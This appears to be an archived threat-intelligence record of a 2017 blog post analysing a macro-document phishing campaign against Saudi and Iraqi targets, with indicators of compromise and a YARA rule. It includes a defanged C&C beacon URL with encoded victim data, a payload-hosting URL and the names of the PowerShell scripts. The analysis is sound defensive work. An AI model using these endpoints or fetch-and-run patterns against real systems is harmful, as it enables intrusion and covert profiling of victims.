{
	"id": "8e3ed199-17bc-435e-805c-fa73df4cc144",
	"created_at": "2026-04-06T00:11:24.286052Z",
	"updated_at": "2026-04-10T13:11:46.385069Z",
	"deleted_at": null,
	"sha1_hash": "20f15de94c959541b0e44e8e901aa23682b1b486",
	"title": "Continued Activity targeting the Middle East",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 359744,
	"plain_text": "Continued Activity targeting the Middle East\r\nBy Mo Bustami\r\nPublished: 2017-10-04 · Archived: 2026-04-05 15:04:55 UTC\r\nThis blog will discuss and uncover additional details regarding a recent campaign targeting entities in the Middle East.\r\nOn Tuesday, September 26, 2017, MalwareBytes blogged about a phishing campaign targeting the Middle East, more specifically Saudi Arabia.\r\nI started by trying to find the sample that the blog post analyzed, and I was able to find it submitted to the great sandboxing site Hybrid Analysis (big shout-out to @PayloadSecurity for the great service).\r\nThe file (b0a365d0648612dfc33d88183ff7b0f0) was named GSB[.]doc, which is short for Government Service Bus, or in Arabic قناة التكامل الحكومية, as seen below.\r\nThe lure document purporting to be from GSB, or تكامل\r\nLooking at the macro code within the document, I found that the code not only tries to fetch additional scripts from Pastebin but also tries to reach the Filebin site to fetch the same file, as shown below after some cleanup of the code.\r\nMoving on, I wanted to see if I could find additional samples based on the macro code embedded within this sample, and I started by looking at the PowerShell file name that was mentioned in the MalwareBytes blog:\r\nNTSTATS[.]ps1\r\nDoing some quick research, I was able to find this tweet from September 18, 2016 by @ReaQta, which discussed another sample making use of the same PowerShell script; this time, however, the code was trying to reach a GitHub instance to fetch the script. There was no mention of the lure sample, though.
\r\nUsing the awesome feature within Hybrid Analysis that allows you to see if a certain sample was seen before, I was able to find this sample (0873ddb4df8320b493a719bdddd7d182); this time the lure document had an Iraqi flavor to it, with the content referencing in Arabic the Iraqi National Intelligence System, as shown below:\r\nhttps://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html\r\nPage 1 of 4\n\nFrom this, I wanted to see how deep the rabbit hole goes and what else is out there, so I started looking at the PowerShell \"NTSTATS[.]ps1\" script more in depth, and I was able to find similarities with another PowerShell script, \"Updater[.]ps1\", that was mentioned back in March of this year in an analysis done by Morphisec. As a matter of fact, once you deobfuscate both scripts they can look something like this:\r\nNTSTAT vs Updater\r\nIt is worth mentioning that there are a lot of similarities between this campaign and the one described by Morphisec, even when it comes to C\u0026C communication and the use of Base64-encoded commands.\r\nI want to be clear, though, that I am not saying they are the same actor, but they definitely have many similarities.\r\nAnalyzing the macro code, the C\u0026C and the scripts allowed me to find additional samples that I am including in the IoC section at the end. Most of these samples are available via multiple sources including VT, Hybrid Analysis, Pastebin and Twitter, and most of them have themes focusing on the Middle East region.\r\nI also created a very simple YARA rule - included at the end of this blog - and I was able to collect additional and newer samples like this one, which was uploaded to VT today. 
The actors seem to have modified their macro code and even their PowerShell script, as shown below.\r\nI was able to find a reference to this script posted to Pastebin as early as September 23, 2017.\r\nThey are also now using a modified Base64-encoded C\u0026C communication, shown below, to a new IP, 148.251.204[.]131:8060:\r\nhxxp://148.251.204[.]131:8060/?p=%7CT1y)*I9Sk9ITi1QQ35%5BdXNlcjF%5BfjMyLW)pdHw2LjEuNz%7CwMX$NaWNy@3NvZnQgV2luZG93cyA3IEVudGVycH)pc2UgfEM6XFdp@*R\r\nIn closing, I want to highlight that this campaign has been active since July, based on samples that I came across on the platforms I mentioned above, and seems to be continuing as of the writing of this blog. Interestingly, with this one there hasn't been a final payload dropped on the victim machines as yet. The scripts, as described by the blogs I referenced, are mainly collecting information about the targets and profiling them.\r\nSome honorable mentions that I would like to highlight, since they indirectly helped with this: they always post interesting stuff, and I was able to use their posts to pivot to other samples.\r\nIOCs:\r\nSHA-256 
Hashes\r\nIP Addresses:\r\n144.76.109[.]88\r\n138.201.75[.]227\r\n148.251.204[.]131:8060\r\nURLs:\r\nhttp://144.76.109[.]88/al/ag.txt\r\nKnown PowerShell File Names:\r\nNTSTATS.ps1\r\nal.ps1\r\nUpdater.ps1\r\nsystem.ps1\r\nYARA Rule:\r\nrule ME_MalDoc\r\n{\r\n    meta:\r\n        author = \"@MoBustami\"\r\n        date = \"2017-10-01\"\r\n    strings:\r\n        // hard-coded string shared by the macro documents collected in this campaign\r\n        $s0 = \"sdjNEqLClKPFAnuDvIyGTSgaMWRQYhrzXekcxifZ\"\r\n    condition:\r\n        $s0\r\n}\r\nSource: https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html"
	],
	"report_names": [
		"continued-activity-targeting-middle-east.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434284,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/20f15de94c959541b0e44e8e901aa23682b1b486.pdf",
		"text": "https://archive.orkl.eu/20f15de94c959541b0e44e8e901aa23682b1b486.txt",
		"img": "https://archive.orkl.eu/20f15de94c959541b0e44e8e901aa23682b1b486.jpg"
	}
}